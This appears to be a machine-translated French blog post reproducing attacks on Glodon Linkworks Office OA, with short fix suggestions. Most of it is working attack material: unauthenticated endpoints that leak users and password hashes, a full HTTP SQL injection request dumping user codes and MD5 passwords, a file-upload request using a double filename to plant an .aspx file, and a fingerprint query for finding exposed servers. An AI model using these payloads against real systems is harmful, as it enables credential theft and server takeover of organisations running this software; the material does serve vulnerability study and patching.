[Récurrence de la vulnérabilité] Collecte de vulnérabilités Glodon OA (fuite d'informations + injection SQL + téléchargement de fichiers)


déclaration

Veuillez ne pas utiliser les technologies pertinentes dans cet article pour vous livrer à des tests illégaux. Toutes les conséquences et pertes directes ou indirectes causées par la diffusion et l'utilisation des informations ou des outils fournis dans cet article sont de la responsabilité de l'utilisateur lui-même. Toutes les conséquences néfastes et L'auteur de l'article n'a aucune importance. Cet article est uniquement à des fins éducatives.

Il y a une fuite d’informations dans Glodon OA

1. Aperçu de la vulnérabilité

Il y a une fuite d'informations dans Glodon Linkworks Office OA. Un attaquant peut utiliser cette vulnérabilité pour obtenir le mot de passe du compte pour se connecter au backend, provoquant d'autres impacts.

2. Récurrence des vulnérabilités

L'interface du système est la suivante. Afficher tous les utilisateurs
Insérer la description de l'image ici
avec des URL potentiellement dangereuses. Afficher tous les projets. Afficher le mot de passe du compte. Après le décryptage, connectez-vous au système backend comme suit.http://url/Org/service/Service.asmx
Insérer la description de l'image ici
http://url/Org/service/Service.asmx/GetAllUsersXml
Insérer la description de l'image ici
http://url/Org/service/Service.asmx/GetDeptXml4GEPS
Insérer la description de l'image ici
http://url/Org/service/Service.asmx/GetUserXml4GEPS
Insérer la description de l'image ici

Insérer la description de l'image ici

3. Suggestions de réparation

1. Désactivez les pages ou les applications qui divulguent des informations sensibles.
2. Passez à une version sécurisée


Vulnérabilité d'injection SQL Glodon Linkworks Office OA + vulnérabilité de téléchargement de fichiers en arrière-plan

1. Présentation du produit

Glodon Linkworks Office OA (Office Automation) est une solution bureautique complète conçue pour améliorer l'efficacité du travail et les capacités de collaboration au sein d'une organisation. Il fournit une série de fonctions et d'outils pour aider les entreprises à gérer et à traiter les tâches de bureau, les processus et les documents quotidiens.

2. Aperçu de la vulnérabilité

Étant donné que l' GetIMDictionaryinterface OA du bureau Glodon Linkworks ne filtrait pas efficacement les entrées de l'utilisateur, elle a été intégrée à l'instruction de requête SQL, ce qui a entraîné une vulnérabilité d'injection SQL dans le système. Il msgbroadcastuploadfile.aspxexiste une vulnérabilité de téléchargement de fichiers en arrière-plan dans l'interface. Une fois que l'attaquant a obtenu les informations d'administrateur via l'injection SQL, il peut se connecter et envoyer un package de requête pour obtenir les autorisations du serveur.

3. Environnement de récurrence

  • Empreinte digitale Intergraph : web.body="/Services/Identification/Server/"
    Insérer la description de l'image ici
    visitez l'URL suivante pour vérifier si la vulnérabilité existe.
    http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
    Insérer la description de l'image ici
    Si la situation ci-dessus prouve que la vulnérabilité existe.

POC d'injection SQL
 :

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: XX.XX.XX.XX:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ASP.NET_SessionId=zldmbkj4ufv4xjlkzvudfs31; GTP_IdServer_LangID=2052; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER –

Insérer la description de l'image ici
Utilisez le décryptage MD5 et essayez de vous connecter au backend.

POC de téléchargement de fichier en arrière-plan
 :

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: XX.XX.XX.XX:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: 登录后的cookie
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Length: 195

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
Content-Type: application/text
 
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj—

Insérer la description de l'image ici
Insérer la description de l'image ici

4. Suggestions de réparation

1. Restreindre l'accès aux adresses sources. N'ouvrez pas le système à Internet sauf si nécessaire.
2. Mettre à jour vers la dernière version

Je suppose que tu aimes

Origine blog.csdn.net/weixin_46944519/article/details/132976132
conseillé
Classement